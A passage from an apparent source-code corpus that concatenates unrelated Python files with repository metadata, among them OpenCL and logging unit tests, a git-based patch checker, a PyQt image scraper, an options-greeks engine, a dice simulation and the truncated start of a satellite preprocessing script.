for t in frange(0, 1.0, .1):
mat = spidir.make_hky_matrix(bgfreq, kappa, t)
a = 1/3.0
r = (1/4.0)*(1 + 3*exp(-4*a*t))
s = (1/4.0)*(1 - exp(-4*a*t))
mat2 = [[r, s, s, s],
[s, r, s, s],
[s, s, r, s],
[s, s, s, r]]
for i in xrange(4):
for j in xrange(4):
fequal(mat[i][j], mat2[i][j])
if __name__ == "__main__":
unittest.main()
| gpl-2.0 | -5,437,146,158,349,073,000 | 24.368421 | 79 | 0.458852 | false |
alepulver/changesets | patch_analyzer/patch_applicable_version.py | 1 | 2905 | import sys
import os
import patch_utils
from subprocess import Popen, PIPE, call
UTILITY_PATH = "src/main/java/"
PREFIX_BRANCH = "refs/tags/mule-"
def filter_starting_with(l, start):
return filter(lambda path: path.startswith(start), l)
def add_java(c):
return c + ".java"
def git_diff_files(git_source, v_origin, v_destination):
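    # Return the set of .java files (relative to src/main/java/) that changed
    # between the two release tags in the given git checkout.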
working_dir = os.getcwd()
try:
os.chdir(git_source)
call(["git", "fetch", "--tags"])
p = Popen(["git", "diff", "--name-only", v_origin + ".." + v_destination], stdout=PIPE)
output, _ = p.communicate()
files = [file.decode() for file in output.split(b"\n")]
return set(map(lambda file: file.split(UTILITY_PATH)[-1], filter(lambda file: UTILITY_PATH in file, files)))
finally:
os.chdir(working_dir)
class PatchDiffer:
def __init__(self, mule_ce_path, mule_ee_path):
self.ce = mule_ce_path
self.ee = mule_ee_path
@staticmethod
def conflicts(files, diff_files):
return list(set(files) & diff_files)
def is_applicable(self, changed_classes, origin_version, destination_version):
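        # Classes under org.* live in the CE repository and classes under com.*
        # in the EE one; the patch is applicable only if none of its classes
        # changed between the origin and destination versions.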
ce_files = map(add_java, filter_starting_with(changed_classes, "org"))
ee_files = map(add_java, filter_starting_with(changed_classes, "com"))
ce_diff = git_diff_files(self.ce, origin_version, destination_version)
ee_diff = git_diff_files(self.ee, origin_version, destination_version)
total_conflicts = self.conflicts(ce_files, ce_diff) + self.conflicts(ee_files, ee_diff)
self.last_conflicts = total_conflicts
return len(self.last_conflicts) == 0
def get_conflicts(self):
assert hasattr(self, "last_conflicts")
return self.last_conflicts
def print_usage():
print("Usage: ")
print("python " + sys.argv[0] + " <patch-file> <ce-git-folder> <ee-git-folder> <destination-version> (<origin-version>)")
print("If the origin version is not specified, it will be inferred from the Patch filename. Example:")
print("\tpython " + sys.argv[0] + " SE-2618-3.7.3.jar ../Git/mule-ce ../Git/mule-ee 3.7.4")
def main(args):
if len(args) < 4 or len(args) > 5:
print_usage()
sys.exit(1)
if len(args) == 4:
version = os.path.basename(args[0]).replace(".jar", "").split("-")[-1]
args.append(version)
patch_source, ce_path, ee_path, v_dest, v_org = args
v_dest = PREFIX_BRANCH + v_dest
v_org = PREFIX_BRANCH + v_org
p = PatchDiffer(ce_path, ee_path)
classes = patch_utils.modified_classes(patch_source)
if p.is_applicable(classes, v_org, v_dest):
print("The patch " + args[0] + " is applicable to the " + args[3] + " version")
else:
print("The patch " + args[0] + " has conflicts in files:")
for file in p.get_conflicts():
print("\t- " + file)
if __name__ == "__main__":
main(sys.argv[1:])
| mit | 2,717,768,461,241,766,000 | 34.864198 | 125 | 0.619621 | false |
apatriciu/OpenStackOpenCL | ServerSidePythonOpenCLInterface/tests/testOpenCLInterfaceQueueObjects.py | 1 | 5499 | import unittest
import PyOpenCLInterface
import sys
class LaptopResources:
listDevicesIDs = [0]
dictProperties = {}
invalidQueueID = 1
device_type = "GPU"
class TestQueues(unittest.TestCase):
# define the expected response
testResources = LaptopResources()
def setUp(self):
retErr = PyOpenCLInterface.Initialize(self.testResources.device_type)
self.assertEqual(retErr, 0)
def tearDown(self):
pass
def testCreateQueue(self):
"""Creates a new context"""
try:
contextID, retErr = PyOpenCLInterface.CreateContext(self.testResources.listDevicesIDs, self.testResources.dictProperties)
self.assertEqual(retErr, 0)
# create mem queue
queueCreateFlags = []
queueID, retErr = PyOpenCLInterface.CreateQueue(contextID, self.testResources.listDevicesIDs[0], queueCreateFlags)
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [queueID])
queueProperty, retErr = PyOpenCLInterface.GetQueueProperties(queueID)
self.assertEqual(queueProperty['id'], queueID)
self.assertEqual(queueProperty['Device'], self.testResources.listDevicesIDs[0])
self.assertEqual(queueProperty['Context'], contextID)
retErr = PyOpenCLInterface.ReleaseQueue(queueID)
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [])
retErr = PyOpenCLInterface.ReleaseContext(contextID)
self.assertEqual(retErr, 0)
except:
print "Exception caught:", sys.exc_info()[0]
def testGetUnknownObjectProperties(self):
"""Tries to retrieve the properties of an inexistent device"""
queueID = 0
self.assertRaises(PyOpenCLInterface.error, PyOpenCLInterface.GetQueueProperties, queueID)
def testRetainAndRelease(self):
"""
        Create and release a queue
"""
try:
contextID, retErr = PyOpenCLInterface.CreateContext(self.testResources.listDevicesIDs, self.testResources.dictProperties)
self.assertEqual(retErr, 0)
queueAttribs = []
queueID, retErr = PyOpenCLInterface.CreateQueue(contextID, self.testResources.listDevicesIDs[0], queueAttribs)
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [queueID])
retErr = PyOpenCLInterface.ReleaseQueue( queueID )
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [])
except:
print "Exception caught: ", sys.exc_info()[0]
self.assertEqual(1, 0)
# try to release again
self.assertRaises(PyOpenCLInterface.error, PyOpenCLInterface.ReleaseQueue, queueID)
self.assertRaises(PyOpenCLInterface.error, PyOpenCLInterface.RetainQueue, queueID)
try:
retErr = PyOpenCLInterface.ReleaseContext(contextID)
self.assertEqual(retErr, 0)
except:
print "Exception caught: ", sys.exc_info()[0]
self.assertEqual(1, 0)
def testMultipleQueues(self):
"""
Creates multiple queues
"""
try:
contextID, retErr = PyOpenCLInterface.CreateContext(self.testResources.listDevicesIDs, self.testResources.dictProperties)
self.assertEqual(retErr, 0)
queueAttribs = []
queue1ID, retErr = PyOpenCLInterface.CreateQueue(contextID, self.testResources.listDevicesIDs[0], queueAttribs)
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [queue1ID])
queueAttribs = []
queue2ID, retErr = PyOpenCLInterface.CreateQueue(contextID, self.testResources.listDevicesIDs[0], queueAttribs)
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [queue1ID, queue2ID])
queue1Property, retErr = PyOpenCLInterface.GetQueueProperties(queue1ID)
self.assertEqual(queue1Property['id'], queue1ID)
self.assertEqual(queue1Property['Device'], self.testResources.listDevicesIDs[0])
self.assertEqual(queue1Property['Context'], contextID)
queue2Property, retErr = PyOpenCLInterface.GetQueueProperties(queue2ID)
self.assertEqual(queue2Property['id'], queue2ID)
self.assertEqual(queue2Property['Device'], self.testResources.listDevicesIDs[0])
self.assertEqual(queue2Property['Context'], contextID)
retErr = PyOpenCLInterface.ReleaseQueue( queue1ID )
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [queue2ID])
retErr = PyOpenCLInterface.ReleaseQueue( queue2ID )
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [])
retErr = PyOpenCLInterface.ReleaseContext(contextID)
self.assertEqual(retErr, 0)
except:
print "Exception caught: ", sys.exc_info()[0]
self.assertEqual(1, 0)
if __name__ == "__main__":
unittest.main()
| apache-2.0 | -9,009,627,036,438,824,000 | 44.446281 | 133 | 0.652846 | false |
codeAB/music-player | singer.py | 1 | 4368 | #!/usr/bin/python3
# -*- coding: utf8 -*-
"""
Fetch the singer's portrait image via Baidu image search
"""
import sys
import os
import urllib.parse
import urllib.request
import re
from PyQt5.QtWidgets import (
QApplication, QWidget, QPushButton, QLineEdit, QLabel)
from PyQt5.QtWebKitWidgets import QWebPage, QWebView
from PyQt5.QtCore import Qt, QUrl, pyqtSlot,QTimer
from PyQt5.QtGui import ( QCursor)
class Singer(QWidget):
# def __init__(self,singer,music):
def __init__(self,singer):
super().__init__()
        # Keep the window on top of all other windows
self.setWindowFlags(Qt.WindowOverridesSystemGestures)
        # For X11
self.setWindowFlags(Qt.X11BypassWindowManagerHint)
self.singer = singer
# self.music = music
self.initUI()
self.show()
def initUI(self):
self.w= QWidget(self)
self.setGeometry(300,100,1000,600)
l = QLabel("实用说明,搜索需要的图片,在搜索结果页面点击选择的图片即可设置。。双击此处退出",self)
l.move(0,0)
self.web = QWebView(self)
self.web.loadFinished.connect(self.test)
self.web.page().setLinkDelegationPolicy(QWebPage.DelegateAllLinks)
self.web.page().linkClicked.connect(self.linkClicked)
self.web.setGeometry(0, 30, 1000, 570)
# self.btn = QPushButton("测试",self);
# self.btn.clicked.connect(self.test)
# self.btn.move(300,550)
self.web.load(QUrl("http://image.baidu.com/"))
def test(self):
print("jiazaijieshu")
frame = self.web.page().currentFrame()
searchinput = frame.findFirstElement('#kw')
d = frame.findFirstElement('.img_area_container_box')
d.removeAllChildren()
searchinput.setAttribute("value",self.singer)
# searchinput.setAttribute("readonly","readonly")
def linkClicked(self,url):
# print(url.toString())
url = url.toString()
pattern = re.compile(r'&word=(.*?)&')
s = pattern.findall(url)
k = {'word': s[0]}
kv = urllib.parse.urlencode(k)
url = url.replace("word="+s[0], kv)
res = urllib.request.urlopen(url).read().decode("utf8")
pattern = re.compile(r'currentImg(.*)<div>',re.S)
s = pattern.findall(res)
print(s)
src="http://img3.imgtn.bdimg.com/it/u=673176467,634723054&fm=21&gp=0.jpg"
pattern = re.compile(r'src="(.*?)"')
s = pattern.findall(s[0])
        img_url = s[0].replace("&amp;", "&")  # decode the HTML entity in the scraped URL
local = os.path.join('./cache/', self.singer+'.jpg')
user_agent = 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0'
req = urllib.request.Request(img_url)
req.add_header('Referer', 'http://music.baidu.com/?from=new_mp3')
req.add_header('User-Agent', user_agent)
f = urllib.request.urlopen(req)
data = f.read()
with open(local, "wb") as code:
code.write(data)
# self.music.picture.setStyleSheet("QLabel{ background:#9B0069;border-image:url("+local+")}")
def mousePressEvent(self, event):
if event.button() == Qt.LeftButton:
self.drag_flag = True
# if hasattr(self.window, 'widget1'):
# self.begin_position2 = event.globalPos() - \
# self.window.widget1.pos()
self.begin_position = event.globalPos() - self.pos()
event.accept()
self.setCursor(QCursor(Qt.OpenHandCursor))
def mouseMoveEvent(self, QMouseEvent):
if Qt.LeftButton and self.drag_flag:
# if hasattr(self.window, 'widget1'):
# self.window.widget1.move(
# QMouseEvent.globalPos() - self.begin_position2)
# self.window.move(QMouseEvent.globalPos() - self.begin_position)
# else:
self.move(QMouseEvent.globalPos() - self.begin_position)
QMouseEvent.accept()
def mouseReleaseEvent(self, QMouseEvent):
self.drag_flag = False
self.setCursor(QCursor(Qt.ArrowCursor))
# def leaveEvent(self,QMouseEvent):
# self.close()
def mouseDoubleClickEvent(self,e):
self.close()
if __name__ == '__main__':
app = QApplication(sys.argv)
s = Singer("张杰")
sys.exit(app.exec_())
| gpl-3.0 | 6,152,910,160,387,240,000 | 34.090909 | 105 | 0.593971 | false |
tpoy0099/option_calculator | engine_algorithm/calculate_engine.py | 1 | 12864 | #coding=utf8
import threading as THD
import datetime as DT
import engine_algorithm.data_analyser as ANALYSER
import engine_algorithm.database_adaptor as DADAPTOR
from utility.data_handler import TableHandler
from marketdata.marketdata_adaptor import MarketdataAdaptor
from utility.messager import MessageQueue
from utility.self_defined_types import MessageTypes, PassedIndexType, XAxisType
################################################################
class Engine:
etf_code = '510050.SH'
ETF_QUOTE_HEADERS = ('last_price', 'open_price', 'high_price',
'low_price', 'update_time')
STATISTICS_HEADERS = ('implied_vol', 'delta', 'gamma', 'vega',
'theta', 'intrnic', 'time_value')
#-------------------------------------------------------------
def __init__(self, gui):
self.gui = gui
#original position table
self.ori_positions = None
#etf quote
self.etf = TableHandler()
self.etf.reset(1, Engine.ETF_QUOTE_HEADERS, -1)
#marketdata service
self.md = MarketdataAdaptor()
#database service
self.dp = DADAPTOR.DataProxy()
self.__reloadPositions()
#flow control
self.last_sync_time = DT.datetime.now()
#gui communication
self.msg = MessageQueue()
self.msg_event = THD.Event()
self.msg_thread = THD.Thread(target=self.__handleMessage)
self.msg_thread.start()
return
def quit(self):
self.__pushMsg(MessageTypes.QUIT)
self.msg_thread.join()
#-------------------------------------------------------------
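    #the qry* methods below run on the GUI thread and only enqueue a message;
    #the worker thread started in __init__ handles it in __handleMessage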
def qryUpdateData(self):
self.__pushMsg(MessageTypes.UPDATE_QUOTE_DATA)
def qryEtfQuoteFeed(self):
self.__pushMsg(MessageTypes.GUI_QUERY_ETF_QUOTE_FEED)
def qryTableDataFeed(self):
self.__pushMsg(MessageTypes.GUI_QUERY_TABLE_FEED)
def qryPositionBasedata(self):
self.__pushMsg(MessageTypes.GUI_QUERY_POSITION_BASEDATA_FEED)
def qryCalGreeksSensibilityByGroup(self, option_group_id, stock_group_id, x_axis_type):
self.__pushMsg(MessageTypes.GUI_QUERY_CAL_SENSI,
(option_group_id, stock_group_id,
PassedIndexType.GROUP, x_axis_type))
def qryCalGreeksSensibilityByPosition(self, option_rows, stock_rows, x_axis_type):
self.__pushMsg(MessageTypes.GUI_QUERY_CAL_SENSI,
(option_rows, stock_rows,
PassedIndexType.ROW, x_axis_type))
def qryExerciseCurveByGroup(self, option_group_id, stock_group_id):
self.__pushMsg(MessageTypes.GUI_QUERY_EXERCISE_CURVE,
(option_group_id, stock_group_id, PassedIndexType.GROUP))
def qryExerciseCurveByPosition(self, option_rows, stock_rows):
self.__pushMsg(MessageTypes.GUI_QUERY_EXERCISE_CURVE,
(option_rows, stock_rows, PassedIndexType.ROW))
def qryReloadPositions(self, positions_data=None):
self.__pushMsg(MessageTypes.GUI_QUERY_RELOAD_POSITIONS, positions_data)
def qrySavePositionCsv(self):
self.__pushMsg(MessageTypes.SAVE_POSITION_CSV)
def __pushMsg(self, msg_type, content=None):
self.msg.pushMsg(msg_type, content)
self.msg_event.set()
def __handleMessage(self):
try:
while True:
msg = self.msg.getMsg()
if msg is None:
self.msg_event.wait()
self.msg_event.clear()
#update marketdata order by user
elif msg.type is MessageTypes.UPDATE_QUOTE_DATA:
self.__updateData()
#qry engine provide table data
elif msg.type is MessageTypes.GUI_QUERY_TABLE_FEED:
self.__feedDataTable()
#qry etf data
elif msg.type is MessageTypes.GUI_QUERY_ETF_QUOTE_FEED:
self.__feedEtfQuote()
#qry position base data for editor
elif msg.type is MessageTypes.GUI_QUERY_POSITION_BASEDATA_FEED:
self.__feedPositionBaseData()
#cal greeks sensibility
elif msg.type is MessageTypes.GUI_QUERY_CAL_SENSI:
self.__calGreekSensibility(msg.content[0], msg.content[1],
msg.content[2], msg.content[3])
elif msg.type is MessageTypes.GUI_QUERY_EXERCISE_CURVE:
self.__calOptionExerciseProfitCurve(msg.content[0], msg.content[1],
msg.content[2])
elif msg.type is MessageTypes.GUI_QUERY_RELOAD_POSITIONS:
self.__reloadPositions(msg.content)
elif msg.type is MessageTypes.SAVE_POSITION_CSV:
self.__savePosition2Csv()
elif msg.type is MessageTypes.QUIT:
break
except Exception as err:
self.gui.onEngineError(err)
#thread terminate
return
#-----------------------------------------------------------
#positions should be a instance of TableHandler
def __reloadPositions(self, positions=None):
if type(positions) is TableHandler:
pos = positions.toDataFrame()
else:
pos, err = DADAPTOR.loadPositionCsv()
if not err is None:
raise Exception('load position csv failed ...')
#save pos
self.ori_positions = pos
#separate data
option_rows = list()
stock_rows = list()
for r in range(0, pos.shape[0]):
code = pos['code'].iat[r]
contract_type = self.md.getContractType(code)
if contract_type in ['call', 'put']:
option_rows.append(r)
else:
stock_rows.append(r)
option_df = pos.iloc[option_rows, :]
stock_df = pos.iloc[stock_rows, :]
self.dp.initialize(option_df, stock_df)
self.__updateData(True)
return
def __savePosition2Csv(self):
DADAPTOR.savePositionCsv(self.ori_positions)
return
def __updateData(self, update_baseinfo=False):
self.last_sync_time = DT.datetime.now()
#stock
self.__updateEtfData()
stk = self.dp.getStockData()
for r in range(0, stk.rows()):
self.__updateStockRow(r)
#option
opt = self.dp.getOptionData()
for r in range(0, opt.rows()):
if update_baseinfo:
self.__updateRowBaseInfos(r)
self.__updateOptionRow(r)
#update database
self.dp.updateData()
return
#update etf price data
def __updateEtfData(self):
etf_last_price = self.md.getLastprice(Engine.etf_code)
self.etf.setByHeader(0, 'last_price', etf_last_price)
self.etf.setByHeader(0, 'update_time', self.md.getLastUpdateTime(Engine.etf_code))
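        #once open_price has been initialized (>= 0), just extend the running
        #high/low with the latest price; otherwise fetch open/high/low once
        #from the marketdata service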
if not self.etf.getByHeader(0, 'open_price') < 0:
self.etf.setByHeader(0, 'high_price', max(etf_last_price, self.etf.getByHeader(0, 'high_price')))
self.etf.setByHeader(0, 'low_price', min(etf_last_price, self.etf.getByHeader(0, 'low_price')))
else:
O = self.md.getDailyOpen(Engine.etf_code)
H = self.md.getDailyHigh(Engine.etf_code)
L = self.md.getDailyLow(Engine.etf_code)
if O and H and L:
self.etf.setByHeader(0, 'open_price', O)
self.etf.setByHeader(0, 'high_price', H)
self.etf.setByHeader(0, 'low_price', L)
return
def __updateStockRow(self, irow):
pos = self.dp.getStockData()
last_price = self.etf.getByHeader(0, 'last_price')
float_profit = ANALYSER.getFloatProfit(pos.getByHeader(irow, 'dir'),
pos.getByHeader(irow, 'lots'),
pos.getByHeader(irow, 'open_price'),
last_price, self.md.getStockMultiplier())
pos.setByHeader(irow, 'last_price', last_price)
pos.setByHeader(irow, 'float_profit', float_profit)
return
#update basic_infos like expiry, strike_price etc.
def __updateRowBaseInfos(self, irow):
pos = self.dp.getOptionData()
code = pos.getByHeader(irow, 'code')
pos.setByHeader(irow, 'type', self.md.getContractType(code))
pos.setByHeader(irow, 'strike', self.md.getStrikePrice(code))
pos.setByHeader(irow, 'expiry', self.md.getExerciseDate(code))
pos.setByHeader(irow, 'left_days', self.md.getDaysBeforeExercise(code))
return
#update
def __updateOptionRow(self, irow):
pos = self.dp.getOptionData()
code = pos.getByHeader(irow, 'code')
last_price = self.md.getLastprice(code)
pos.setByHeader(irow, 'last_price', last_price)
###################################
S = self.etf.getByHeader(0, 'last_price')
K = pos.getByHeader(irow, 'strike')
T = pos.getByHeader(irow, 'left_days')
opt_type = pos.getByHeader(irow, 'type')
#greeks
stat = None
if opt_type.lower() == 'call':
stat = ANALYSER.getStatistics(S, K, T, last_price, True)
elif opt_type.lower() == 'put':
stat = ANALYSER.getStatistics(S, K, T, last_price, False)
if stat:
for header in Engine.STATISTICS_HEADERS:
pos.setByHeader(irow, header, stat[header])
#trade state
float_profit = ANALYSER.getFloatProfit(pos.getByHeader(irow, 'dir'),
pos.getByHeader(irow, 'lots'),
pos.getByHeader(irow, 'open_price'),
last_price, self.md.getOptionMultiplier())
pos.setByHeader(irow, 'float_profit', float_profit)
return
def __feedDataTable(self):
opt_data = TableHandler()
opt_data.copyDataframe(self.dp.getOptionData().getDataFrame())
stk_data = TableHandler()
stk_data.copyDataframe(self.dp.getStockData().getDataFrame())
ptf_data = TableHandler()
ptf_data.copyDataframe(self.dp.getPortfolioData().getDataFrame())
self.gui.onRepTableFeed(opt_data, stk_data, ptf_data)
return
def __feedEtfQuote(self):
snap_etf = TableHandler()
snap_etf.copy(self.etf)
self.gui.onRepEtfQuoteFeed(snap_etf)
return
def __feedPositionBaseData(self):
tdata = TableHandler()
tdata.copyDataframe(self.ori_positions)
self.gui.onRepPositionBasedataFeed(tdata)
return
def __calGreekSensibility(self, option_idx, stock_idx, idx_type, x_axis_type):
opt = self.dp.getOptionData()
stk = self.dp.getStockData()
if idx_type is PassedIndexType.GROUP:
opt_data = opt.getPositionDataByGroupId(option_idx)
stk_data = stk.getPositionDataByGroupId(stock_idx)
elif idx_type is PassedIndexType.ROW:
opt_data = opt.getPositionDataByRowIdx(option_idx)
stk_data = stk.getPositionDataByRowIdx(stock_idx)
else:
return
if x_axis_type is XAxisType.PRICE:
rtn = ANALYSER.getGreeksSensibilityByPrice(opt_data, stk_data,
self.etf.getByHeader(0, 'last_price'))
elif x_axis_type is XAxisType.VOLATILITY:
rtn = ANALYSER.getGreeksSensibilityByVolatility(opt_data, stk_data,
self.etf.getByHeader(0, 'last_price'))
elif x_axis_type is XAxisType.TIME:
rtn = ANALYSER.getGreeksSensibilityByTime(opt_data, stk_data,
self.etf.getByHeader(0, 'last_price'))
else:
return
self.gui.onRepCalGreeksSensibility(rtn, x_axis_type)
return
def __calOptionExerciseProfitCurve(self, option_idx, stock_idx, idx_type):
opt = self.dp.getOptionData()
stk = self.dp.getStockData()
if idx_type is PassedIndexType.GROUP:
opt_data = opt.getPositionDataByGroupId(option_idx)
stk_data = stk.getPositionDataByGroupId(stock_idx)
elif idx_type is PassedIndexType.ROW:
opt_data = opt.getPositionDataByRowIdx(option_idx)
stk_data = stk.getPositionDataByRowIdx(stock_idx)
else:
return
rtn = ANALYSER.getExerciseProfitCurve(opt_data, stk_data,
self.etf.getByHeader(0, 'last_price'))
self.gui.onRepCalExerciseCurve(rtn)
return
| gpl-2.0 | -3,853,331,277,950,889,500 | 40.230769 | 109 | 0.569419 | false |
seecr/meresco-components | test/log/directorylogtest.py | 1 | 5323 | ## begin license ##
#
# "Meresco Components" are components to build searchengines, repositories
# and archives, based on "Meresco Core".
#
# Copyright (C) 2014-2015, 2018, 2020 Seecr (Seek You Too B.V.) https://seecr.nl
# Copyright (C) 2014 Stichting Bibliotheek.nl (BNL) http://www.bibliotheek.nl
# Copyright (C) 2014, 2020 Stichting Kennisnet https://www.kennisnet.nl
# Copyright (C) 2015 Koninklijke Bibliotheek (KB) http://www.kb.nl
# Copyright (C) 2020 Data Archiving and Network Services https://dans.knaw.nl
# Copyright (C) 2020 SURF https://www.surf.nl
# Copyright (C) 2020 The Netherlands Institute for Sound and Vision https://beeldengeluid.nl
#
# This file is part of "Meresco Components"
#
# "Meresco Components" is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# "Meresco Components" is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with "Meresco Components"; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
## end license ##
from seecr.test import SeecrTestCase
from meresco.components.log import DirectoryLog
from os import listdir
from os.path import join, isdir
from meresco.components.log.directorylog import NR_OF_FILES_KEPT
class DirectoryLogTest(SeecrTestCase):
def testMinimalLog(self):
log = DirectoryLog(self.tempdir)
log.log(
timestamp=1257161136.0
)
self.assertEqual(['2009-11-02-query.log'], listdir(self.tempdir))
with open(join(self.tempdir, '2009-11-02-query.log')) as fp:
self.assertEqual('2009-11-02T11:25:36Z - - - - - \n', fp.read())
def testAppendToLog(self):
with open(join(self.tempdir, '2009-11-02-query.log'), 'w') as f:
f.write('line0\n')
log = DirectoryLog(self.tempdir)
log.log(**DEFAULT_KWARGS())
self.assertEqual(['2009-11-02-query.log'], listdir(self.tempdir))
with open(join(self.tempdir, '2009-11-02-query.log')) as fp:
self.assertEqual('line0\n2009-11-02T11:25:36Z 11.22.33.44 1.1K 1.300s 42hits /path query=arguments\n', fp.read())
def testNewDayNewLogFile(self):
kwargs = DEFAULT_KWARGS()
kwargs['timestamp'] = 1257161136.0
log = DirectoryLog(self.tempdir)
log.log(**kwargs)
kwargs['timestamp'] += 24 * 60 * 60
log.log(**kwargs)
self.assertEqual(['2009-11-02-query.log', '2009-11-03-query.log'], sorted(listdir(self.tempdir)))
with open(join(self.tempdir, '2009-11-03-query.log')) as fp:
self.assertEqual('2009-11-03T11:25:36Z 11.22.33.44 1.1K 1.300s 42hits /path query=arguments\n', fp.read())
def testLogDirCreated(self):
logDir = join(self.tempdir, 'amihere')
self.assertFalse(isdir(logDir))
DirectoryLog(logDir)
self.assertTrue(isdir(logDir))
def testSetExtension(self):
log = DirectoryLog(self.tempdir, extension='-the-end.log')
log.log(**DEFAULT_KWARGS())
self.assertEqual(['2009-11-02-the-end.log'], listdir(self.tempdir))
def testRemoveOldLogs(self):
nrOfFilesKept = 5
kwargs = DEFAULT_KWARGS()
kwargs['timestamp'] = 1257161136.0
for filename in ("%03d-the-end.log" % r for r in range(10)):
open(join(self.tempdir, filename), 'w').close()
for filename in ("%03d-the-other-end.log" % r for r in range(10)):
open(join(self.tempdir, filename), 'w').close()
filesBefore = listdir(self.tempdir)
log = DirectoryLog(self.tempdir, extension='-the-end.log', nrOfFilesKept=nrOfFilesKept)
log.log(**kwargs)
filesAfter = listdir(self.tempdir)
self.assertFalse('000-the-end.log' in filesAfter)
self.assertTrue('000-the-other-end.log' in filesAfter)
filesBefore = listdir(self.tempdir)
kwargs['timestamp'] += 3600*24
log.log(**kwargs)
filesAfter = listdir(self.tempdir)
self.assertFalse('001' in filesAfter)
self.assertEqual(len(filesAfter), len(filesBefore))
with open(join(self.tempdir, '015-the-end.log'), 'w') as fp: pass
with open(join(self.tempdir, '016-the-end.log'), 'w') as fp: pass
kwargs['timestamp'] += 3600*24
log.log(**kwargs)
self.assertEqual(5+10, len(listdir(self.tempdir)))
def testAsStream(self):
times = [1257161136.0]
d = DirectoryLog(self.tempdir)
d._now = lambda: times[0]
d.write('my line\n')
d.flush()
self.assertEqual(['2009-11-02-query.log'], listdir(self.tempdir))
with open(join(self.tempdir, '2009-11-02-query.log')) as fp:
self.assertEqual('my line\n', fp.read())
DEFAULT_KWARGS = lambda: dict(
timestamp=1257161136.0,
size=1.1,
path='/path',
ipAddress='11.22.33.44',
duration=1.3,
queryArguments='query=arguments',
numberOfRecords=42,
)
| gpl-2.0 | -5,416,497,279,097,028,000 | 40.913386 | 125 | 0.658463 | false |
JuanScaFranTru/Simulation | Practico4/ej3.py | 1 | 1227 | from random import random
def udiscreta(a, b):
u = random()
return int(u * (b - a + 1)) + a
def experiment():
"""
A pair of fair dice is thrown simultaneously and the sum of both is
recorded. The process is repeated until every possible result
(2, 3, ..., 12) has appeared at least once.
"""
# Use a set to store the observed sums
throws = set()
iterations = 0
while len(throws) != 11:
# Roll the dice. The values are uniformly distributed over the
# interval [1, 6] (the possible values of a die)
die1 = udiscreta(1, 6)
die2 = udiscreta(1, 6)
# Add the sum of this throw to the set
throws.add(die1 + die2)
# One more iteration has happened
iterations += 1
return iterations
def ej3(n):
for i in range(4):
prob1 = 0
prob2 = 0
for j in range(n):
prob1 += experiment()
prob2 += experiment() ** 2
mean = prob1 / n
mean2 = prob2 / n
sigma = (mean2 - mean ** 2) ** (1/2)
print("N = ", n, "Media = ", mean, "Desviación estandar =", sigma)
n = n * 10
ej3(100)
| gpl-3.0 | 4,595,522,826,287,092,700 | 25.586957 | 77 | 0.568275 | false |
GFZ-Centre-for-Early-Warning/REM_satex_plugin | run_as_script.py | 1 | 17723 | class SatEx:
'''
Class for running SatEx as script
'''
def __init__(self,config):
import os, subprocess
self.config = config
#setup subprocess differently for windows
self.startupinfo = None
if os.name == 'nt':
self.startupinfo = subprocess.STARTUPINFO()
self.startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
def updatePForm(self):
#get user edits
self.ls_path = self.config['ls_path']+'/'
self.roi = self.config['roi']
self.out_fname = self.config['out_fname1']
if (self.ls_path =='/' or self.roi == '' or self.out_fname == ''):
return False
else:
return True
def updateCForm(self):
#get user edits
self.raster = self.config['raster']
self.in_train = self.config['in_train']
self.out_fname = self.config['out_fname']
self.label = self.config['label']
self.sieve = self.config['sieve']
self.external = self.config['external']
#in case an external SVM is provided the testing is optional
if self.external:
if (self.raster =='' or self.out_fname == '' or self.sieve == ''):
return False
else:
return True
else:
if (self.raster =='' or self.in_train == '' or self.out_fname == '' or self.label == '' or self.sieve == ''):
return False
else:
return True
def select_input_raster(self):
dirname = PyQt4.QtGui.QFileDialog.getExistingDirectory(self.Pdlg, "Select input directory ","",PyQt4.QtGui.QFileDialog.ShowDirsOnly)
def run_preprocessing(self):
"""Run method that performs all the real work"""
valid_input=self.updatePForm()
import utils
import traceback
#import qgis.core
import ogr
import os
import subprocess
try:
import otbApplication
except:
print 'ERROR: Plugin requires installation of OrfeoToolbox'
#find the number of different L8 scenes
#by reading all TIFs splitting off '_Bxy.TIF' and getting unique strings
e = 'Unspecified error'
#instantiate utilities function
ut = utils.utils()
try:
try:
#check if input is not empty string
1/valid_input
except ZeroDivisionError:
e = str('Please fill all required input fields')
raise Exception
try:
#delete any old tmp files that might be in the directory from a killed task
old=ut.delete_tmps(self.ls_path)
#if old > 0: qgis.core.QgsMessageLog.logMessage('Old *satexTMP* files were present. They were deleted.')
if old > 0: print 'Old *satexTMP* files were present. They were deleted.'
except:
e = str('Could not delete old *satexTMP* files. Function utils.delete_tmps.')
raise Exception
try:
pattern = '*.TIF'
scenes = set(['_'.join(s.split('_')[:1]) for s in ut.findFiles(self.ls_path,pattern)])
if len(scenes)==0:
pattern = '*.tif'
scenes = set(['_'.join(s.split('_')[:1]) for s in ut.findFiles(self.ls_path,pattern)])
1/len(scenes)
except ZeroDivisionError:
e = str('Found no scene in {}'.format(self.ls_path))
raise Exception
else:
print str('Found {} scene(s) in {}'.format(len(scenes),self.ls_path))
#check shapefile roi
try:
driver = ogr.GetDriverByName('ESRI Shapefile')
dataSource = driver.Open(self.roi,0)
